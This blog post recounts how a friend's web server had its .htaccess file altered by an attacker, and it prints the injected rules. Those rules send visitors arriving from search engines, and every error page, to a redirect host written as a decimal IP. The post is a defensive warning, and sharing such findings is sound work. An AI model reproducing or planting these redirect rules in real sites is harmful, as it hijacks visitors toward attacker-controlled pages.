Exploit Search Engine Attack – bitrid

Recently one of my friend had his server attacked by a hacker, and they were able to modify the .htaccess file.
They had added several redirect conditions and ErrorDocument conditions.

He was really worried that AVG Antivirus was reporting the virus “Exploit Search Engine Attack – ~bitrid/” and was blocking access.
I really loved AVG Antivirus, and credit goes to their forum with a hint on some kind of redirect script.

The .htaccess had the following code which was causing this issue.
Probably if you come across any such issue it is better to look into the .htaccess files.
You might also check with the hosting company probably they may review the system security.

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http: // 1502998896/~bitrid/ [R=301,L]

ErrorDocument 401 http: //1502998896/~bitrid/
ErrorDocument 403 http: //1502998896/~bitrid/
ErrorDocument 404 http: //1502998896/~bitrid/
ErrorDocument 500 http: //1502998896/~bitrid/

I still wonder how the hacker could modify the .htaccess, and they never touched any othe files!!!
I just Hope no one else gets affected this way 😉